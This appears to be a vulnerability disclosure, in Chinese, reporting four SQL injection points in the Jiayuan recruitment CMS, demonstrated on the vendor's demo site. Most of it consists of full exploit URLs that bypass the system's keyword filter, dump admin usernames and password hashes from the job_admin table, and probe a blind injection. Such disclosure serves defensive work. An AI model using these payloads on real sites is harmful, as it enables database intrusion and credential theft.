### 简要描述:
嘉缘人才系统4处SQL注入。
官网demo测试。
### 详细说明:
嘉缘人才系统触屏版http://m.rccms.com。
第一处:
```
http://m.rccms.com/co/company.php?id=1065
```
[<img src="https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912419a82d7ae38010ff98396194a45c3f726.png)
修改参数为id=1065 and,出现SQL错误。
```
http://m.rccms.com/co/company.php?id=1065%20and
```
[<img src="https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191912582bf24840b40aaaf19bdca6009487cf47.png)
修改参数为id=1065 and 1=1, 信息又出来了,基本可以确定这里存在SQL注入。
[<img src="https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1919135007b31d09e6f92b3bde7d6c04bd56730c.png)
嘉缘人才系统对SQL会check是否存在union/select等,union的话1.union就可以然过,select的话,在前面加一个@`'`,最后加一个#'就可以绕过,所以构造SQL如下:
```
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1%23'
```
这个会报SQL错误,因为表的列数不对,然后我们继续
```
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4%23'
id=1065%0aand%0a@`'`%0aand%0a1.union%0aselect%0a1,2,3,4,5%23'
```
一直到没有SQL错误能正常输出,参数为:
```
id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
[<img src="https://images.seebug.org/upload/201411/1919193097914fbab8e9d02537d96dde9117b1aa.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1919193097914fbab8e9d02537d96dde9117b1aa.png)
好了,我们替换上面的63为导出管理员表的数据的select:
```
(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin))
```
完整的参数为:
```
1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
好了,数据显示出来了。
```
http://m.rccms.com/co/company.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
[<img src="https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png)
第二处:
```
http://m.rccms.com/co/hire.php?id=1
```
```
http://m.rccms.com/co/hire.php?id=1065%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144%0alimit%0a1%23%27
```
[<img src="https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png" alt="hire.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png)
第三处:
```
http://m.rccms.com/co/hires.php?id=2
```
```
2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
```
http://m.rccms.com/co/hires.php?id=2%0aand%0a@`%27`%0aand%0a1.union%0aselect%0a1,1,2,3,4,5,6,7,8,9,10,(select(group_concat(a_user,0x3d,a_pass,0x7c))from%0ajob_admin),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%0alimit%0a1%23%27
```
[<img src="https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png" alt="hires.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png)
第四处:
```
http://m.rccms.com/co/map.php?id=2
```
id参数可以盲注。
```
http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x63)
```
返回正常页面,
[<img src="https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png" alt="map.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png)
```
http://m.rccms.com/co/map.php?id=1065%20and%20substr(user(),1,1)%3Dchar(0x64)
```
返回参数错误
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191921117c4dab2aaf28a3e4f594a6fdfb3dece1.png)
[<img src="https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png" alt="hire.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1920033250987f8a9db7942d496f721038e963eb.png)
[<img src="https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png" alt="hires.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192003509f5ce7679ba923c81ea82f675f3fb0f2.png)
[<img src="https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png" alt="map.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19200403ff642c4bc9f6a5557b7717e20554d95b.png)
京公网安备 11010502034610号
暂无评论